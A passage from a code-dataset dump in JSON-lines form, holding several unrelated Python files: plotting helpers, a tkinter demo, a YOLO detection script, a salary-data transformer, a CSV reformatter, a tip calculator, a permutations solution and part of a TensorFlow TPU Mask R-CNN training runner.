model.coef_ if coef > 0]\n\t\tcoefs_neg = [coef for coef in model.coef_ if coef < 0]\n\t\t\n\t\tif boundary == None:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.coef_ > 0]).sort_values('Importance', ascending = False)\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.coef_ < 0]).sort_values('Importance', ascending = True)\n\t\telse:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.coef_ > 0]).sort_values('Importance', ascending = False)[:boundary]\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.coef_ < 0]).sort_values('Importance', ascending = True)[:boundary]\n\t\n\tif plot == True:\n\t\tfig = plt.figure(figsize = figsize)\n\t\tplt.subplot(211)\t\n\t\tp = sns.barplot(y= pos_imps.index, x = pos_imps['Importance'], orient='h')\n\t\tp.set_xlabel(\"Relative importance\",fontsize=12)\n\t\tp.set_ylabel(\"Features\",fontsize=12)\n\t\tplt.title(\"Positive importances\")\n\t\tfor i, v in enumerate(pos_imps['Importance']):\n\t\t\tplt.text(v, i, \"\"+str(np.round(v,3)), color='#e59471', va='center', fontweight='bold')\n\t\t\t\n\t\t\n\t\tplt.subplot(212)\n\t\tp = sns.barplot(y=neg_imps.index, x = neg_imps['Importance'], orient='h')\n\t\tp.set_xlabel(\"Relative importance\",fontsize=12)\n\t\tp.set_ylabel(\"Features\",fontsize=12)\n\t\tplt.title(\"Negative importances\")\n\n\t\tfor i, v in enumerate(neg_imps['Importance']):\n\t\t\tplt.text(v, i, \"\"+str(np.round(v,3)), color='#e59471', va='center', ha = 'right', fontweight='bold')\n\t\t\t\n\t\tplt.subplots_adjust(top = 0.9)\n\t\tplt.show()\n\t\t\n\treturn pos_imps, neg_imps\n\t\t\n\n\ndef plot_counts(dataframe, x, hue = None, boundary = None, ascending = None, figsize = (12,8), xlabel = 'Feature', ylabel = 'Counts', title = '', fontsize = 13, rotation = None, palette = None):\n \"\"\"\n Function used to display a countplot of desired variables.\n\n Parameters:\n \n dataframe = just as the name implies, expects datatframe object\n x - feature variable\n hue - categorical variable in data to map plot aspects to different colors\n boundary - number of unique feature values to display. By default set to None. Useful when there are dozens of possible values\n ascending - used when boundary is specified. By default set to None as order depends on order of the hue variable. \n figsize - plot size. By default width = 12 and height = 8\n xlabel - just as the name implies, expects label for x-axis\n ylabel - just as the name implies, expects label for y-axis\n title - just as the name implies, expects plot title\n\n \"\"\"\n f, ax = plt.subplots(figsize = figsize)\n \n if palette != None:\n sns.set_palette(palette)\n else:\n sns.set_palette(palette = None)\n if (boundary != None) & (ascending == False): \n sns.countplot(x = x, hue = hue, data = dataframe, order = dataframe[x].value_counts().iloc[:boundary].index)\n elif (boundary != None) & (ascending == True):\n sns.countplot(x = x, hue = hue, data = dataframe, order = dataframe[x].value_counts(ascending = True).iloc[:boundary].index)\n else:\n sns.countplot(x = x, hue = hue, data = dataframe)\n \n if rotation != None:\n plt.xticks(rotation = rotation)\n plt.xlabel(xlabel, fontsize = fontsize)\n plt.ylabel(ylabel, fontsize = fontsize)\n plt.title(title, fontsize = fontsize)\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":22787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"200429642","text":"#!/usr/bin/env python3\n\nfrom tkinter import ttk\nimport tkinter as tk\n\nroot = tk.Tk()\nmain = ttk.Frame(root)\nmain.pack(side=\"left\",fill=\"both\",expand=True)\n\ntk.Label(root,text=\"Label Top\",bg=\"green\").pack(side=\"top\",expand=\"True\",fill=\"both\")\ntk.Label(root,text=\"Label Top\",bg=\"blue\").pack(side=\"top\",expand=\"True\",fill=\"both\")\ntk.Label(root,text=\"Label Left\",bg=\"yellow\").pack(side=\"left\",expand=True,fill=\"both\")\n\nroot.mainloop()","sub_path":"Python-GUI/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"493768491","text":"import sys\nimport numpy as np\nimport cv2\nimport time\n\nimport yolov2tiny\n\ndef resize_input(im):\n imsz = cv2.resize(im, (416, 416))\n imsz = imsz / 255.\n imsz = imsz[:,:,::-1]\n return np.asarray(imsz, dtype=np.float32)\n\ndef image_object_detection(in_image, out_image, debug):\n frame = cv2.imread(in_image)\n\n y2t = yolov2tiny.YOLO_V2_TINY([1, 416, 416, 3], \"../y2t_weights.pickle\", debug)\n\n t_end2end = time.time() \n\n _frame = resize_input(frame)\n _frame = np.expand_dims(_frame, axis=0)\n\n t_inference = time.time()\n tout = y2t.inference(_frame)\n t_inference = time.time() - t_inference\n\n tout = np.squeeze(tout)\n boxes = yolov2tiny.postprocessing(tout)\n frame = cv2.resize(frame, (416, 416), interpolation = cv2.INTER_CUBIC)\n\n for b in boxes:\n print(b[1], b[2], b[3])\n frame = cv2.rectangle(frame, b[1], b[2], b[3])\n cv2.putText(frame, b[0], (int(min(b[1][0], b[2][0]) - 1), int(min(b[1][1], b[2][1])) - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, b[3], 1)\n\n t_end2end = time.time() - t_end2end\n\n cv2.imwrite(out_image, frame)\n\n print('DNN inference elapsed time: %.3f' % t_inference)\n print('End-to-end elapsed time : %.3f' % t_end2end)\n\ndef main():\n if len(sys.argv) < 4 or sys.argv[3] not in ('-DEBUG', '-NDEBUG'):\n print (\"Usage: python3 __init__.py [in_image] [out_image] [-DEBUG/NDEBUG]\")\n sys.exit()\n image_in = sys.argv[1] \n image_out = sys.argv[2] \n debug = True if sys.argv[3] == '-DEBUG' else False\n\n if debug:\n print('Debug mode enabled')\n\n image_object_detection(image_in, image_out, debug)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cs492-projects/proj3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"328870781","text":"from . import base\nfrom . import mixins\n\n\nclass TransformedRecord(mixins.GenericCompensationMixin,\n mixins.GenericDepartmentMixin,\n mixins.GenericJobTitleMixin,\n mixins.MembershipMixin,\n mixins.OrganizationMixin,\n mixins.PostMixin,\n base.BaseTransformedRecord):\n MAP = {\n 'department': 'Department ',\n 'name': 'Name',\n 'job_title': 'Title',\n 'last_name': 'Last Name',\n 'hire_date': 'Hire Date',\n 'pay_status': 'FT or PT Status',\n 'compensation': 'Annual Salary',\n 'race': 'Race', # Not used yet, need to allow multiple\n 'system_status': 'COA',\n }\n\n NAME_FIELDS = ('name', )\n ORGANIZATION_NAME = 'Texas Tech University{suffix}'\n\n # All employees are full-time right now\n compensation_type = 'Full Time'\n\n @property\n def is_valid(self):\n return bool(self.race.strip())\n\n @property\n def is_system(self):\n return self.system_status == 'S'\n\n @property\n def organization_name(self):\n suffix = ' System' if self.is_system else ''\n return self.ORGANIZATION_NAME.format(suffix=suffix)\n\n @property\n def organization(self):\n return {\n 'name': self.organization_name,\n 'children': self.department_as_child,\n }\n\n @property\n def identifier(self):\n \"\"\"\n Identifier by Texas Tech Systems\n\n Ignore everything but name/gender. We have not found any\n duplicate name gender records (yet), and should not as TT\n includes middle initials.\n \"\"\"\n excluded = [self.race_key, self.department_key, self.job_title_key,\n self.hire_date_key, self.compensation_key,\n self.system_status_key, ]\n return {\n 'scheme': 'tx_salaries_hash',\n 'identifier': base.create_hash_for_record(self.data,\n exclude=excluded)\n }\n\n @property\n def person(self):\n name = self.get_name()\n return {\n 'family_name': name.last,\n 'given_name': name.first,\n 'additional_name': name.middle,\n 'name': unicode(name),\n }\n\n\ntransform = base.transform_factory(record_class=TransformedRecord,\n transform_func=base.generic_merge_cell_transform)\n","sub_path":"tx_salaries/utils/transformers/texas_tech_system.py","file_name":"texas_tech_system.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"212966362","text":"import argparse\nfrom datetime import datetime\nimport ast\nimport pandas as pd\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-b', '--batch', help='Batch letter to name outputs.')\nargs = parser.parse_args()\n\nif args.batch:\n batch = args.batch\nelse:\n batch = input('Enter batch letter: ')\n\nfileList = ['subjectMatchesReviewed_BatchC2019-11-13 09.19.01 copy.csv']\n\n\ndef singleSelection(vocabType, results, selection):\n results = ast.literal_eval(results)\n selection = selection - 1\n newSubject = results[selection]\n newSubject = newSubject.strip()\n subjectDict['newSubject'] = newSubject\n if vocabType == 'fast':\n subjectDict['newKey'] = 'dc.subject.fast'\n if vocabType == 'mesh':\n subjectDict['newKey'] = 'dc.subject.mesh'\n subject_list.append(subjectDict)\n\n\ndef multipleSelections(vocabType, results, selection):\n results = ast.literal_eval(results)\n subjects = []\n for select in selection:\n select = select.strip()\n select = int(select)\n select = select - 1\n newSubject = results[select]\n newSubject = newSubject.strip()\n subjects.append(newSubject)\n subjects = '|'.join(subjects)\n subjectDict['newSubject'] = subjects\n if vocabType == 'fast':\n subjectDict['newKey'] = 'dc.subject.fast'\n if vocabType == 'mesh':\n subjectDict['newKey'] = 'dc.subject.mesh'\n subject_list.append(subjectDict)\n\n\ndef exactSubject(results):\n results = results.strip()\n subjectDict['newSubject'] = results\n subject_list.append(subjectDict)\n\n\nerror_list = []\nsubject_list = []\nfor filename in fileList:\n df_subjects = pd.read_csv(filename, header=0)\n ori_total = df_subjects.cleanedSubject.size\n print(ori_total)\n for index, row in df_subjects.iterrows():\n print(str(ori_total-index)+' left')\n row = dict(row)\n subjectDict = row.copy()\n subjectDict['oldKey'] = 'dc.subject'\n cleanedSubject = row['cleanedSubject']\n vocabType = row['type']\n results = row['results']\n selection = row['selection']\n try:\n selection = int(selection)\n except ValueError:\n if pd.isnull(selection):\n selection = selection\n elif ',' in selection:\n selection = selection.split(',')\n else:\n selection = selection.strip()\n if vocabType == 'fast_exact':\n subjectDict['newKey'] = 'dc.subject.fast'\n exactSubject(results)\n elif vocabType == 'mesh_exact':\n subjectDict['newKey'] = 'dc.subject.mesh'\n exactSubject(results)\n elif isinstance(selection, int):\n singleSelection(vocabType, results, selection)\n elif isinstance(selection, list):\n multipleSelections(vocabType, results, selection)\n elif selection == 'new selection' and ('[' not in results):\n subjectDict['newSubject'] = results\n if vocabType == 'fast':\n subjectDict['newKey'] = 'dc.subject.fast'\n if vocabType == 'mesh':\n subjectDict['newKey'] = 'dc.subject.mesh'\n elif selection == 'none' or vocabType == 'not found':\n subjectDict['newSubject'] = cleanedSubject\n subjectDict['newKey'] = 'dc.subject'\n subject_list.append(subjectDict)\n else:\n error_list.append(subjectDict)\n\n\nprint('{} errors found'.format(len(error_list)))\n\ndt = datetime.now().strftime('%Y-%m-%d %H.%M.%S')\ndf = pd.DataFrame.from_dict(subject_list)\ndf2 = pd.DataFrame.from_dict(error_list)\n\nsubjectFile = 'subjectsCombined'+'_Batch'+batch+'_'+dt+'.csv'\nerrorFile = 'errors_Batch'+batch+'_'+dt+'.csv'\ndf.to_csv(subjectFile, index=False)\ndf2.to_csv(errorFile, index=False)\n","sub_path":"reformatCSVFromFASTSearches.py","file_name":"reformatCSVFromFASTSearches.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"456067486","text":"print(\"Welcome to the tip calculator\")\n#If the bill was $150.00, split between 5 people, with 12% tip. \nbill = float(input((\"What is the total bill ? \")))\n#Each person should pay (150.00 / 5) * 1.12 = 33.6\ntip_percent = int(input((\"What perentage tip will you like to give ? \")))\n#Format the result to 2 decimal places = 33.60\nnum_people= int(input((\"How many people are spliting the bill ? \")))\n\nbill_per_person = bill/num_people\n\ntip = (tip_percent/100) * bill_per_person\n\nyour_bill = round(bill_per_person + tip,2)\n\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n#HINT 1: https://www.google.com/search?q=how+to+round+number+to+2+decimal+places+python&oq=how+to+round+number+to+2+decimal\n#HINT 2: https://www.kite.com/python/answers/how-to-limit-a-float-to-two-decimal-places-in-python\nyour_bill= \"{:.2f}\".format(your_bill)\nprint(f\"Each person should pay ${your_bill}\")\n","sub_path":"Day 3/Tip_calculator.py","file_name":"Tip_calculator.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"523980579","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/25 23:00\n# @Author : weiyu\n# @File : 46_permutations.py\n\n# 递归\nclass Solution:\n def permute(self, nums):\n res = []\n self.recursion(nums, [], res)\n return res\n\n def recursion(self, nums, path, res):\n if len(nums) == len(path):\n res.append(path)\n for i in list(set(nums).difference(set(path))):\n self.recursion(nums, path + [i], res)\n\n # def recursion(self, nums, path, res):\n # if not nums:\n # res.append(path)\n # for i in range(len(nums)):\n # self.recursion(nums[:i] + nums[i + 1:], path + [nums[i]], res)\n\n","sub_path":"Week_02/46_permutations.py","file_name":"46_permutations.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"152249777","text":"# Copyright 2018 Google. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Train_and_eval MaskRcnn with low level API.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\nimport os\nimport threading\nimport time\nimport six\n\nimport tensorflow as tf\nfrom tensorflow.contrib.tpu.python.tpu import device_assignment as tpu_device_assignment\nfrom tensorflow.contrib.tpu.python.tpu import tpu\nfrom tensorflow.contrib.tpu.python.tpu import tpu_feed\nfrom tensorflow.contrib.tpu.python.tpu import tpu_function\nfrom tensorflow.python.framework import graph_io\nimport eval_multiprocess\nimport mask_rcnn_params\nimport runner_utils\nfrom mlp_log import mlp_log\n\n\n_INITIAL_LOSS = 1e7\n_STOP = -1\n_MAX_NUM_CHECKPOINT_THREADS = 1\n# for spatial partition\n_NUM_CORES_TO_COMPUTATION_SHAPE = {\n 1: [1, 1, 1],\n 2: [1, 1, 2],\n 4: [1, 2, 2],\n 8: [2, 2, 2],\n 16: [4, 2, 2],\n}\n\n\nclass TrainEvalLowLevelRunner(object):\n \"\"\"Run Train via direct session.run calls.\"\"\"\n\n def __init__(self, tpu_cluster_resolver, train_params, eval_params,\n eval_steps, eval_metric, input_partition_dims=None,\n num_cores_per_replica=None, tpu_job_name=None):\n tf.logging.info(\"TrainLowLevelRunner: constructor\")\n\n self.tpu_cluster_resolver = tpu_cluster_resolver\n self.eval_metric = eval_metric\n self.train_params = train_params\n self.eval_params = eval_params\n self.train_params[\"batch_size\"] = (\n train_params[\"train_batch_size\"] // train_params[\"num_shards\"])\n self.eval_params[\"batch_size\"] = (\n eval_params[\"eval_batch_size\"] // eval_params[\"num_shards\"])\n self.tpu_job_name = tpu_job_name\n\n self.model_dir = train_params[\"model_dir\"]\n self.iterations_per_loop = train_params[\"iterations_per_loop\"]\n self.eval_steps = eval_steps\n self.num_shards = self.train_params[\"num_shards\"]\n self.input_flattener = runner_utils.InputsFlattener()\n self.eval_input_flattener = runner_utils.InputsFlattener()\n self.num_hosts = None\n self.train_eval_compile_op = None\n self.train_eval_op = None\n self.infeed_queue = []\n self.eval_infeed_queue = []\n self.outfeed_names = []\n self.outfeed_tensors = []\n self.enqueue_ops = []\n self.eval_enqueue_ops = []\n self.dequeue_ops = []\n self.dataset_initializer = []\n self.eval_dataset_initializer = []\n self.scaffold_fn = None\n # Having two separate sessions and graphs to make the initialization faster.\n self.input_sess = None\n self.train_eval_sess = None\n self.input_graph = tf.Graph()\n self.train_eval_graph = tf.Graph()\n self.session_config = tf.ConfigProto(\n allow_soft_placement=True, isolate_session_state=True,\n operation_timeout_in_ms=600 * 60 * 1000) # 10 hours\n cluster_spec = self.tpu_cluster_resolver.cluster_spec()\n if cluster_spec:\n self.session_config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())\n self.tpu_init = tf.contrib.tpu.initialize_system()\n self.tpu_shutdown = tf.contrib.tpu.shutdown_system()\n self.master = self.tpu_cluster_resolver.get_master()\n self.init_sess = tf.Session(self.master, config=self.session_config)\n self.device_topology = self.init_sess.run(self.tpu_init)\n self.input_partition_dims = input_partition_dims\n self.use_spatial_partition = input_partition_dims is not None\n self.num_cores_per_replica = num_cores_per_replica\n if self.use_spatial_partition:\n computation_shape = _NUM_CORES_TO_COMPUTATION_SHAPE[\n self.num_cores_per_replica]\n self.device_assignment = tpu_device_assignment.device_assignment(\n topology=self.device_topology,\n computation_shape=computation_shape,\n num_replicas=self.num_shards)\n tf.logging.info(\"num_cores_per_replica: %d\", self.num_cores_per_replica)\n tf.logging.info(\"computation_shape: %s\", str(computation_shape))\n tf.logging.info(\"num_replicas: %d\", self.num_shards)\n tf.logging.info(\"device_assignment.topology.device_coordinates: %s\",\n str(self.device_assignment.topology.device_coordinates))\n tf.logging.info(\"device_assignment.core_assignment: %s\",\n str(self.device_assignment.core_assignment))\n self.input_dims_flattener = runner_utils.InputDimsFlattener(\n self.input_partition_dims)\n eval_input_partition_dims = [dict(self.input_partition_dims[0]), None]\n # don't need to partition the \"is_padding\" dimension\n if eval_params[\"eval_samples\"] % eval_params[\"eval_batch_size\"] != 0:\n eval_input_partition_dims[0][mask_rcnn_params.IS_PADDING] = None\n self.eval_input_dims_flattener = runner_utils.InputDimsFlattener(\n eval_input_partition_dims)\n else:\n self.device_assignment = None\n self.input_dims_flattener = None\n self.eval_input_dims_flattener = None\n # Summary writer writes out train metrics.\n self.summary_writer = tf.summary.FileWriter(self.model_dir)\n # Summary writer writes out eval metrics.\n eval_output_dir = os.path.join(self.model_dir, \"eval\")\n tf.gfile.MakeDirs(eval_output_dir)\n self.eval_summary_writer = tf.summary.FileWriter(eval_output_dir)\n self.infeed_thread = None\n self.total_epoch = self.train_params[\n \"total_steps\"] // self.iterations_per_loop\n\n def shutdown(self):\n \"\"\"Shut down TrainLowLevelRunner.\"\"\"\n tf.logging.info(\"TrainLowLevelRunner: shutdown\")\n if self.infeed_thread:\n self.infeed_thread.join()\n if self.input_sess:\n self.input_sess.close()\n if self.train_eval_sess:\n self.train_eval_sess.close()\n self.summary_writer.close()\n self.eval_summary_writer.close()\n\n def _get_host(self, host_id):\n if self.master in (\"\", \"local\"):\n return \"/replica:0/task:0\"\n job_name = (\n self.tpu_job_name or self.tpu_cluster_resolver.get_job_name() or\n \"tpu_worker\")\n return \"/job:%s/task:%d\" % (job_name, host_id)\n\n def build_enqueue_ops(self, input_fn, params, num_hosts, host_id, iterations,\n is_training=True):\n \"\"\"Build enqueue ops.\"\"\"\n tf.logging.info(\"TrainLowLevelRunner: build_enqueue_ops for %d, train=%g\",\n host_id, is_training)\n\n def get_enqueue_ops_fn(host_id):\n \"\"\"Generate the enqueue ops graph function for training.\"\"\"\n # TODO(b/129084726): make dataset sharding also work for TPU Estimator.\n params[\"dataset_num_shards\"] = num_hosts\n params[\"dataset_shard_id\"] = host_id\n with tf.device(runner_utils.device_for_host(self._get_host(host_id))):\n dataset = input_fn(params)\n iterator = dataset.make_initializable_iterator()\n if is_training:\n self.dataset_initializer.append(iterator.initializer)\n else:\n self.eval_dataset_initializer.append(iterator.initializer)\n\n def enqueue_ops_fn():\n \"\"\"Enqueue ops function for one host.\"\"\"\n per_host_sharded_inputs = []\n control_deps = []\n for _ in range(self.train_params[\"replicas_per_worker\"]):\n with tf.control_dependencies(control_deps):\n features, labels = iterator.get_next()\n if self.use_spatial_partition:\n self.input_dims_flattener.validate_and_flatten_input_dims(\n features, labels)\n flattened_inputs = (\n self.input_flattener.flatten_features_and_labels(\n features, labels))\n control_deps.extend(flattened_inputs)\n per_host_sharded_inputs.append(flattened_inputs)\n\n if self.use_spatial_partition:\n flattened_input_dims = (\n self.input_dims_flattener.flattened_input_dims)\n # pylint: disable=protected-access\n infeed = tpu_feed._PartitionedInfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]),\n host_id=host_id,\n input_partition_dims=flattened_input_dims,\n device_assignment=self.device_assignment)\n self.infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(per_host_sharded_inputs)\n\n infeed = tf.contrib.tpu.InfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]))\n self.infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(\n per_host_sharded_inputs,\n tpu_ordinal_function=functools.partial(\n runner_utils.tpu_ordinal_fn,\n replicas_per_worker=self.train_params[\"replicas_per_worker\"]))\n\n return enqueue_ops_fn\n\n def get_eval_enqueue_ops_fn(host_id):\n \"\"\"Generate the enqueue ops graph function for eval.\"\"\"\n # TODO(b/129084726): make dataset sharding also work for TPU Estimator.\n params[\"dataset_num_shards\"] = num_hosts\n params[\"dataset_shard_id\"] = host_id\n with tf.device(runner_utils.device_for_host(self._get_host(host_id))):\n dataset = input_fn(params)\n iterator = dataset.make_initializable_iterator()\n self.eval_dataset_initializer.append(iterator.initializer)\n\n def eval_enqueue_ops_fn():\n \"\"\"Enqueue ops function for one host.\"\"\"\n per_host_sharded_inputs = []\n control_deps = []\n for _ in range(self.train_params[\"replicas_per_worker\"]):\n with tf.control_dependencies(control_deps):\n features = iterator.get_next()\n if self.use_spatial_partition:\n self.eval_input_dims_flattener.validate_and_flatten_input_dims(\n features, None)\n flattened_inputs = (\n self.eval_input_flattener.flatten_features_and_labels(\n features, None))\n control_deps.extend(flattened_inputs)\n per_host_sharded_inputs.append(flattened_inputs)\n\n if self.use_spatial_partition:\n flattened_input_dims = (\n self.eval_input_dims_flattener.flattened_input_dims)\n # pylint: disable=protected-access\n infeed = tpu_feed._PartitionedInfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]),\n host_id=host_id,\n input_partition_dims=flattened_input_dims,\n device_assignment=self.device_assignment)\n self.eval_infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(per_host_sharded_inputs)\n\n infeed = tf.contrib.tpu.InfeedQueue(\n number_of_tuple_elements=len(per_host_sharded_inputs[0]))\n self.eval_infeed_queue.append(infeed)\n return infeed.generate_enqueue_ops(\n per_host_sharded_inputs,\n tpu_ordinal_function=functools.partial(\n runner_utils.tpu_ordinal_fn,\n replicas_per_worker=self.train_params[\"replicas_per_worker\"]))\n\n return eval_enqueue_ops_fn\n\n with self.input_graph.as_default():\n enqueue_op = runner_utils.wrap_computation_in_while_loop(\n get_enqueue_ops_fn(host_id)\n if is_training else get_eval_enqueue_ops_fn(host_id),\n n=iterations,\n host_name=self._get_host(host_id))\n if is_training:\n self.enqueue_ops.append(enqueue_op)\n else:\n self.eval_enqueue_ops.append(enqueue_op)\n\n def initialize(self, model_fn, input_fn, eval_input_fn):\n \"\"\"Build graph and do initialization for training.\"\"\"\n tf.logging.info(\"TrainAndEvalLowLevelRunner: initialize method\")\n\n self.num_hosts = (\n self.num_shards * self.num_cores_per_replica //\n self.train_params[\"cores_per_worker\"])\n for i in range(self.num_hosts):\n self.build_enqueue_ops(input_fn, self.train_params, self.num_hosts, i,\n self.iterations_per_loop, True)\n self.build_enqueue_ops(eval_input_fn, self.eval_params, self.num_hosts, i,\n self.eval_steps, False)\n\n def infeed_thread_fn():\n \"\"\"Build and infeed session.run calls in a background thread.\"\"\"\n for cur_epoch in range(self.total_epoch):\n tf.logging.info(\"Start to infeed train batches for epoch %d\", cur_epoch)\n self.input_sess.run([self.enqueue_ops])\n tf.logging.info(\"Start to infeed eval batches for epoch %d\", cur_epoch)\n self.input_sess.run([self.eval_enqueue_ops])\n tf.logging.info(\"infeed thread exited.\")\n\n def tpu_train_step(loss):\n \"\"\"Generate the TPU graph.\"\"\"\n del loss\n values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)\n features, labels = self.input_flattener.unflatten_features_and_labels(\n values)\n estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,\n self.train_params)\n loss, train_op = estimator_spec.loss, estimator_spec.train_op\n self.scaffold_fn = estimator_spec.scaffold_fn\n with tf.control_dependencies([train_op]):\n return tf.identity(loss)\n\n @tpu_function.on_device_training_loop\n def train_loop():\n return tf.contrib.tpu.repeat(self.iterations_per_loop, tpu_train_step,\n [_INITIAL_LOSS])\n\n def tpu_eval_step():\n \"\"\"Generate the TPU graph.\"\"\"\n values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)\n (features,\n _) = self.eval_input_flattener.unflatten_features_and_labels(values)\n estimator_spec = model_fn(features, None, tf.estimator.ModeKeys.PREDICT,\n self.eval_params)\n for k, v in six.iteritems(estimator_spec.predictions):\n self.outfeed_names.append(k)\n self.outfeed_tensors.append(v)\n\n with tf.device(runner_utils.device_for_tpu_core(self._get_host(0))):\n outfeed_enqueue_ops = tf.contrib.tpu.outfeed_enqueue_tuple(\n self.outfeed_tensors)\n with tf.control_dependencies([outfeed_enqueue_ops]):\n return tf.no_op()\n\n @tpu_function.on_device_training_loop\n def eval_loop():\n return tf.contrib.tpu.repeat(self.eval_steps, tpu_eval_step, [])\n\n def train_eval_step():\n with tf.control_dependencies(train_loop()):\n return eval_loop()\n\n @tpu_function.on_device_training_loop\n def train_eval_loop():\n return tf.contrib.tpu.repeat(\n self.total_epoch if self.train_params[\"all_in_one_session\"] else 1,\n train_eval_step, [])\n\n def create_dequeue_ops(host_id):\n \"\"\"Create outfeed dequeue ops.\"\"\"\n dequeue_ops = []\n tensor_dtypes = []\n tensor_shapes = []\n for v in self.outfeed_tensors:\n dequeue_ops.append([])\n tensor_dtypes.append(v.dtype)\n tensor_shapes.append(v.shape)\n for i in range(self.eval_params[\"replicas_per_worker\"]):\n with tf.device(runner_utils.device_for_host(self._get_host(host_id))):\n if self.use_spatial_partition:\n replica_id = self.device_assignment.lookup_replicas(host_id, 0)[i]\n ordinal = self.device_assignment.tpu_ordinal(\n replica=replica_id, logical_core=0)\n else:\n ordinal = i\n outfeed_tensors = tf.contrib.tpu.outfeed_dequeue_tuple(\n dtypes=tensor_dtypes,\n shapes=tensor_shapes,\n device_ordinal=ordinal)\n for j, item in enumerate(outfeed_tensors):\n dequeue_ops[j].append(item)\n for j in range(len(outfeed_tensors)):\n dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)\n return dequeue_ops\n\n with self.train_eval_graph.as_default():\n (self.train_eval_compile_op,\n self.train_eval_op) = tpu.split_compile_and_shard(\n train_eval_loop,\n inputs=[],\n num_shards=self.train_params[\"num_shards\"],\n outputs_from_all_shards=False,\n device_assignment=self.device_assignment\n )\n for i in range(self.num_hosts):\n self.dequeue_ops.append({})\n tf.logging.info(\n \"TrainAndEvalLowLevelRunner: get dequeue ops for host:%d\", i)\n host_dequeue_ops = create_dequeue_ops(i)\n for j, dequeue_tenor in enumerate(host_dequeue_ops):\n self.dequeue_ops[i][self.outfeed_names[j]] = dequeue_tenor\n if self.scaffold_fn:\n self.scaffold_fn()\n global_initializer = tf.global_variables_initializer()\n local_initializer = tf.local_variables_initializer()\n graph_io.write_graph(\n self.train_eval_graph.as_graph_def(add_shapes=True), self.model_dir,\n \"graph.pbtxt\")\n self.saver = tf.train.Saver()\n\n # Build tpu train model session and initialize graph\n self.train_eval_sess = tf.Session(\n self.master,\n graph=self.train_eval_graph,\n config=self.session_config)\n\n self.train_eval_sess.run(global_initializer)\n self.train_eval_sess.run(local_initializer)\n # Compiles the train program.\n self.train_eval_sess.run([self.train_eval_compile_op])\n\n # Complete infeed graph generation and session.run calls\n self.input_sess = tf.Session(\n self.master,\n graph=self.input_graph,\n config=self.session_config)\n self.input_sess.run(self.dataset_initializer)\n self.input_sess.run(self.eval_dataset_initializer)\n self.infeed_thread = threading.Thread(target=infeed_thread_fn)\n\n # Starts the clock.\n mlp_log.mlperf_print(key=\"init_stop\", value=None)\n mlp_log.mlperf_print(key=\"run_start\", value=None)\n self.infeed_thread.start()\n\n def write_summary(self, summary_writer, graph, global_step,\n elapsed_time, elapsed_steps, trained_examples):\n \"\"\"Write a per-epoch summary of loss, epoch time, etc.\"\"\"\n with graph.as_default():\n global_step_per_sec = elapsed_steps / elapsed_time\n examples_per_sec = trained_examples / elapsed_time\n if summary_writer is not None:\n global_step_summary = tf.Summary(value=[\n tf.Summary.Value(\n tag=\"global_step/sec\", simple_value=global_step_per_sec)\n ])\n example_summary = tf.Summary(value=[\n tf.Summary.Value(\n tag=\"examples/sec\", simple_value=examples_per_sec)\n ])\n summary_writer.add_summary(global_step_summary, global_step)\n summary_writer.add_summary(example_summary, global_step)\n tf.logging.info(\"step = %d (%.3f sec)\", global_step, elapsed_time)\n tf.logging.info(\"global_step/sec: %g\", global_step_per_sec)\n tf.logging.info(\"examples/sec: %g\", examples_per_sec)\n\n def write_eval_summary(self, summary_writer, eval_results, current_step):\n \"\"\"Write out eval results for the checkpoint.\"\"\"\n with tf.Graph().as_default():\n summaries = []\n for metric in eval_results:\n summaries.append(\n tf.Summary.Value(\n tag=metric, simple_value=eval_results[metric]))\n tf_summary = 